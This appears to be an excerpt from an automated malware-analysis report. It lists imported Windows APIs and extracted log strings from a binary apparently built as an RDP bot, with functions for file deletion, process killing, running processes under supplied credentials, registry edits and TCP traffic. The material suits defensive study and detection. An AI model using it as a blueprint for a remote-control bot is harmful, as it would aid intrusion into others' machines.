                    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                    Similarity
                    • API ID: _errno$fclosefflushfopenfseekfwrite
                    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                    Similarity
                    • API ID: strlen$strcat$CloseErrorHandleLastLogonUser
                    • String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$H:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
                    Similarity
                    • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                    • String ID: (path != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                    Similarity
                    • API ID: ErrorLast$Process$CloseHandleOpenTerminatestrcmp
                    • String ID: (name != NULL) || (pid != 0)$H:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|
                    Similarity
                    • API ID: ErrorFileLast$CloseCreateHandleLock
                    • String ID: $ $(lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$~$~
                    Similarity
                    • API ID: CloseDeleteOpenValuefflushfwrite
                    • String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                    Similarity
                    • API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwrite
                    • String ID: (hnd != NULL)$(sid != NULL)$H:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
                    Similarity
                    • API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
                    • String ID: (pi != NULL)$H:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID: $(attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                    Similarity
                    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                    • String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
                    Similarity
                    • API ID: ErrorLastMetricsSystem$fflushfwrite
                    • String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$H:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
                    Similarity
                    • API ID: CloseCreate
                    • String ID: (key != NULL)$(root != NULL)$?$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
                    Similarity
                    • API ID: strlen
                    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                    Similarity
                    • API ID: Heap$Processstrlen$AllocFree
                    • String ID: (buf != NULL)$(buf_sz != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                    Similarity
                    • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                    • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                    • API String ID: 497672076-345319545
                    Similarity
                    • API ID: ErrorGlobalLastMemoryStatus
                    • String ID: $(mi != NULL)$;$H:/Projects/rdp/bot/codebase/sys.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu)$sys_mem_info$~
                    • API String ID: 3848946878-1815531218
                    Similarity
                    • API ID: ErrorFileLast$CloseCreateHandleSize
                    • String ID: (path != NULL)$(size != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                    • API String ID: 3555958901-3761180060
                    Similarity
                    • API ID: ErrorFileLastModuleName
                    • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path
                    • API String ID: 2776309574-787847008
                    Similarity
                    • API ID: _errno$strtol
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                    • API String ID: 3596500743-1951032453
                    Similarity
                    • API ID: Heapstrlen$FreeProcessstrcmpstrcpy
                    • String ID: ($-RGMLWD-$ORRE$exe
                    • API String ID: 173675053-901114122
                    Similarity
                    • API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
                    • String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 477549591-1116693529
                    Similarity
                    • API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
                    • String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 477549591-1116693529
                    Similarity
                    • API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
                    • String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 477549591-1116693529
                    Similarity
                    • API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
                    • String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 477549591-1116693529
                    Similarity
                    • API ID: CopyErrorFileLastfflushfwrite
                    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                    • API String ID: 2887799713-3464183404
                    Similarity
                    • API ID: ErrorLastsend
                    • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                    • API String ID: 1802528911-690514478
                    Similarity
                    • API ID: Heap_errno$ErrorFreeLastProcessfopenfseeksendstrcpy
                    • String ID: ($-RGMLWD-$ORRE
                    • API String ID: 1421482426-2390005167
                    Similarity
                    • API ID: Sleep_amsg_exit$_initterm
                    • String ID:
                    • API String ID: 2193611136-0
                    Similarity
                    • API ID: CloseHandle
                    • String ID: (pi != NULL)$H:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
                    • API String ID: 2962429428-2428953624
                    Similarity
                    • API ID: ErrorLastfflushfwriteshutdown
                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
                    • API String ID: 2143829457-932964775
                    Similarity
                    • API ID: ErrorLastclosesocketfflushfwrite
                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
                    • API String ID: 152032778-2221966578
                    Similarity
                    • API ID: CriticalDeleteSectionfclose
                    • String ID: Done$[I] (%s) -> %s$debug_cleanup
                    • API String ID: 3387974148-4247581856
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
                    • API String ID: 1729277954-536111009
                    Similarity
                    • API ID: Cleanupfflushfwrite
                    • String ID: Done$[I] (%s) -> %s$net_cleanup
                    • API String ID: 1441811225-3926276259
                    Similarity
                    • API ID: Byte$CharMultiWide$Lead_errno
                    • String ID:
                    • API String ID: 2766522060-0
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539